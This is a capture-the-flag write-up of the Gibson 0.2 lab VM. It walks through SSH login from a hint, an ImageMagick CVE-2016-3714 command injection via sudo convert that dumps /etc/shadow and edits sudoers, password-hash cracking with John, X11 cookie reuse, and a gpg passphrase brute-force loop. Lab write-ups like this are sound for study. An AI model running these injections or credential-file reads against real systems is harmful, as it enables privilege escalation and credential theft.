Gibson 0.2
I decided to get started in the world of CTF writeups with this VM made by Knightmare! The description promised some unexpected twists, but at the same time it didn’t seem to be heavy on reversing and/or binary exploitation, so I felt it was a good place to start. Without further ado, let’s begin!
Service discovery
The starting point is always finding out which services are running on the open ports, so let’s do that.
root@kali:~# nmap -A -p1-65535 192.168.56.102
Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-17 18:14 CEST
Nmap scan report for 192.168.56.102
Host is up (0.00022s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 fb:f6:d1:57:64:fa:38:66:2d:66:40:12:a4:2f:75:b4 (DSA)
| 2048 32:13:58:ae:32:b0:5d:b9:2a:9c:87:9c:ae:79:3b:2e (RSA)
|_ 256 3f:dc:7d:94:2f:86:f1:83:41:db:8c:74:52:f0:49:43 (ECDSA)
80/tcp open http Apache httpd 2.4.7
| http-ls: Volume /
| SIZE TIME FILENAME
| 273 2016-05-07 13:03 davinci.html
|_
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:AF:47:CA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: Host: gibson.example.co.uk; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.56.102
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.83 seconds
Of course I was not going to be able to straightforward SSH in, so I’d better check what’s in the web server.
Web server
I opened Iceweasel and navigated to port 80. There was a single file listed: davinci.html
<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>
This seemed a pretty clear hint to the SSH credentials. I tried the ssh users Margo, davinci, root and eugene
but neither was asked for a password (only publickey). I thought in being explicit, just in case:
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no 192.168.56.102
But no luck, the password login was disabled.
…Then I noticed I had tried Margo, not margo, and guess what?
ssh margo@192.168.56.102 #god
Bingo.
Margo
Of course sudo su didn’t work (it would have been too easy, right?) but I was luckier with sudo -l. It seemed that margo could run /usr/bin/convert as root. The binary was part of the ImageMagick tool… which reminded of CVE-2016-3714.
After some research, I managed to run commands as root exploiting said vulnerability. The fastest way to get root with this was to edit the sudoers file, but before that I played around a little.
margo@gibson:~$ sudo convert 'https://example.com"|cat "/etc/shadow' out.png
root:!:16921:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:16921:0:99999:7:::
dnsmasq:*:16921:0:99999:7:::
landscape:*:16921:0:99999:7:::
sshd:*:16921:0:99999:7:::
libvirt-qemu:!:16921:0:99999:7:::
libvirt-dnsmasq:!:16921:0:99999:7:::
duke:$6$xRLSRx7x$O.REaRUKj6zM.ZAYFBfZEfq.iyoiHKlpNCFlh9D8gQBfRdldL05vAxHmjuTgriKCetSADyWyLKvklZhcQp7mu1:16928:0:99999:7:::
colord:*:16922:0:99999:7:::
eugene:$6$UU15rhob$qZ5B2VjeCk9QIlxXS6QDf9MuxFpNkfAQTc3V3ny.57kLHLj1aOdLnmprfL53niAfztzGMLJqSZaS79sYY1X1a/:16928:0:99999:7:::
margo:$6$Nx0eYFUO$f99BzOSc/hBLbflCsV5912gdcNNUKRi/xGTz7xldbr402BQ367eN.GsCScejNNotaJg9oQPhqdzqq/DcHCKYD/:16928:0:99999:7:::
convert.im6: unable to open image `/tmp/magick-rCN9wlXv': No such file or directory @ error/blob.c/OpenBlob/2638.
convert.im6: unable to open file `/tmp/magick-rCN9wlXv': No such file or directory @ error/constitute.c/ReadImage/583.
convert.im6: no images defined `out.png' @ error/convert.c/ConvertImageCommand/3044.
I cracked the hashes for duke and eugene with John the Ripper, which was surprisingly fast.
root@kali:~/gibson# john hashes.txt
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 75.42% 1/3 (ETA: 18:47:31) 0g/s 811.3p/s 811.3c/s 811.3C/s 9999955..d9999957
secret (eugene)
love (duke)
god (margo)
3g 0:00:00:16 DONE 2/3 (2016-05-17 18:47) 0.1806g/s 729.3p/s 740.8c/s 740.8C/s fiction..jethrotull
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Eugene
duke seemed a pretty normal user, but eugene was good news. From the sudoers file I found out that eugene could execute another command as root:
eugene ALL=(ALL) NOPASSWD: /usr/bin/virt-manager
Which I honestly had no idea what it was. After some googling, I learned that virt-manager is a VM manager! Then I remembered the hints given at the description of the challenge:
- It doesn’t matter what your local subnet is, as long as you keep away from the 192.168.122.0/24 subnet.
- SSH can forward X11.
- The challenge isn’t over with root. The flag is not where you expect to find it.
The network part was interesting.
eugene@gibson::~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:af:47:ca
inet addr:192.168.56.102 Bcast:192.168.56.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:feaf:47ca/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:143078 errors:0 dropped:0 overruns:0 frame:0
TX packets:140857 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9389412 (9.3 MB) TX bytes:11069499 (11.0 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:752 errors:0 dropped:0 overruns:0 frame:0
TX packets:752 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:54416 (54.4 KB) TX bytes:54416 (54.4 KB)
virbr0 Link encap:Ethernet HWaddr fe:54:00:72:e2:fb
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1271 (1.2 KB) TX bytes:1889 (1.8 KB)
vnet0 Link encap:Ethernet HWaddr fe:54:00:72:e2:fb
inet6 addr: fe80::fc54:ff:fe72:e2fb/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6 errors:0 dropped:0 overruns:0 frame:0
TX packets:1665 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:1355 (1.3 KB) TX bytes:87921 (87.9 KB)
Wow, so there was actually another active interface: virbr0. Could it be that, inside the VM, there was ANOTHER VM?
The thing was that I couldn’t SSH as eugene directly, because of the no-password restriction. I could’ve added a public key to his home directory or disabled the restriction, but rather I just su‘d into him.
…Which was a pain, because when running sudo virt-manager it complained about the X11 authentication failing. Of course, I didn’t have an xauth cookie for eugene. So I copied it from margo.
root@kali:~/gibson# ssh -X margo@192.168.56.102
Ubuntu 14.04.3 LTS
margo@192.168.56.102's password: #god
margo@gibson:~$ xauth list
gibson/unix:10 MIT-MAGIC-COOKIE-1 01dccb5a0820e7f65c5211528c49c0eb
margo@gibson:~$ su eugene
Password: #secret
eugene@gibson:/home/margo$ xauth add gibson/unix:10 MIT-MAGIC-COOKIE-1 01dccb5a0820e7f65c5211528c49c0eb
eugene@gibson:/home/margo$ sudo /usr/bin/virt-manager
Holy f*ck, I got in.
Note
Of course, I could’ve always modified the /etc/sudoers file and get root directly:
sudo convert 'https://example.com"|vi "/etc/sudoers' out.png
Change the following line:
margo ALL=(ALL) NOPASSWD: ALL#/usr/bin/convert
And voilà.
margo@gibson:~$ sudo su
root@gibson:/home/margo#
FreeDOS?
The virt-manager GUI appeared, and only one machine named “ftpserv” existed. I opened a shell by double-clicking it and discovered that it was running a FreeDOS :-O Had to Google quite a bit at this point…
Once I thought I could continue, I started by exploring the directories. After a dir I found this directory named GARBAGE which catched my attention.
cd garbage
dir
ADMINSPO.JPG
FLAG.IMG
JZ_UG.ANS
The FLAG.IMG seemed interesting, but I had to find a way to take it outside the box.
I decided to go big and copied the full VM disk image to my Kali box. I’m subtle as that :)
At this point, the root permissions became a need, so I modified the sudoers file as explained before.
margo@gibson:~$ sudo su
root@gibson:/home/margo# cp /var/lib/libvirt/images/ftpserv.img /tmp/
root@gibson:/home/margo# chown margo /tmp/ftpserv.img
And then I was able to get it from my Kali:
root@kali:~# scp margo@192.168.56.102:/tmp/ftpserv.img gibson
Getting the flag
I mounted the image (fun name, KFLYNN, Kevin Flynn from Tron!) and went to garbage.
There I ran exiftool to peek on the metadata of the JPG file:
root@kali:/media/root/KFYLNN/GARBAGE# exiftool adminspo.jpg
ExifTool Version Number : 10.15
File Name : adminspo.jpg
Directory : .
File Size : 120 kB
File Modification Date/Time : 2016:05:04 23:17:44+02:00
File Access Date/Time : 1980:01:01 01:00:00+01:00
File Inode Change Date/Time : 2016:05:04 23:31:08+02:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Big-endian (Motorola, MM)
Image Description : Rabbit.. Flu Shot... TYPE COOKE YOU IDIOT! I'll head them off at the pass
Modify Date : 2016:05:04 22:29:32
Artist : Virtualization is fun.. What's more, esoteric OSes on 192.168.122 are even more fun
User Comment : So there's info here.... Images, hmm... Wasn't that a CVE...? Oh yes... CVE 2016-3714....http://www.openwall.com/lists/oss-security/2016/05/03/18 so which person can run it. Perhaps the man who knew a lot about Sean Connery in Trainspotting when he wasn't causing a 7 point drop in the NYSE
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 800
Image Height : 800
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 800x800
Megapixels : 0.640
Fun, but not useful anymore :)
So it was time to mount flag.img.
There were three files, an executable program, its source code in C, and a hint.txt file.
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cat hint.txt
http://www.imdb.com/title/tt0117951/ and
http://www.imdb.com/title/tt0113243/ have
someone in common... Can you remember his
original nom de plume in 1988...?
So it turns out Trainspotting and Hackers have the actor Jonny Lee Miller in common. I had to search what “nom de plume” meant (lol), but I quickly learnt it translates to “nickname”. I guess I should’ve known that already but… Whatever, Miller’s nickname in Hackers (which takes place in 1988) is “Zero Cool/Crash Override”. But what do I do with that?
I have to say I spent quite too much time trying to break the game in order to get something interesting. Modified the highscores.txt file trying to make it crash, entered ZeroCool and CrashOverride as users just in case, played around with the snake (fun game btw), but eventually…
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 70
drwxr-xr-x 4 root root 1024 May 14 15:07 .
drwxr-x---+ 4 root root 4096 May 21 09:40 ..
-rwxrwxr-x 1 root root 21358 Nov 16 2011 davinci
-rw-r--r-- 1 root root 28030 Nov 16 2011 davinci.c
-rw-r--r-- 1 root root 159 May 5 20:56 hint.txt
drwx------ 2 root root 12288 May 5 20:39 lost+found
drwxr-xr-x 2 root root 1024 May 5 21:07 .trash
Yeah, maybe I should have started by doing that.
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cd .trash/
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121/.trash# ls -la
total 319
drwxr-xr-x 2 root root 1024 May 5 21:07 .
drwxr-xr-x 4 root root 1024 May 14 15:07 ..
---x------ 1 root root 469 May 14 15:18 flag.txt.gpg
-rw-r--r-- 1 root root 320130 Sep 7 2015 LeithCentralStation.jpg
So now I need the passpharse to decrypt the flag! Could it be that the hint.txt was referring to this?
Tried the gpg command with ZeroCool, zerocool, CrashOverride and crashoverride as passphrases to no avail. I ran exiftool on the jpg file, but there was nothing interesting.
So I decided to go full bruteforce and generated some wordlists with cupp’s interactive mode.
root@kali:~/gibson# ~/cupp.py -i
...
root@kali:~/gibson# for i in $(cat ~/cupp/zero.txt); do gpg --passphrase $i flag.txt.gpg; if [ -a "flag.txt" ]; then echo "Passphrase found! $i"; break; fi; done
After some tries and combinations, what finally made the trick was including the word ‘ZeroKool’ AND activating the tool’s l33t mode.
...
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
gpg: WARNING: message was not integrity protected
Passphrase found! Z3r0K00l
root@kali:~/gibson# cat flag.txt
_ _ _ _____ _ ____ _ _ _
| | | | __ _ ___| | __ |_ _| |__ ___ | _ \| | __ _ _ __ ___| |_| |
| |_| |/ _` |/ __| |/ / | | | '_ \ / _ \ | |_) | |/ _` | '_ \ / _ \ __| |
| _ | (_| | (__| < | | | | | | __/ | __/| | (_| | | | | __/ |_|_|
|_| |_|\__,_|\___|_|\_\ |_| |_| |_|\___| |_| |_|\__,_|_| |_|\___|\__(_)
Should you not be standing in a 360 degree rotating payphone when reading
this flag...? B-)
Anyhow, congratulations once more on rooting this VM. This time things were
a bit esoteric, but I hope you enjoyed it all the same.
Shout-outs again to #vulnhub for hosting a great learning tool. A special
thanks goes to g0blin and GKNSB for testing, and to g0tM1lk for the offer
to host the CTF once more.
--Knightmare
Phew! For my first CTF writeup, this one surely got me confused for a while and made me take my time! I’m sure this could have been done better/faster, but nonetheless I managed to complete it. Big thanks to Knightmare for the fun challenege, I really enjoyed the movie references and learned quite a few new things (special mention to the whole FreeDOS thing!)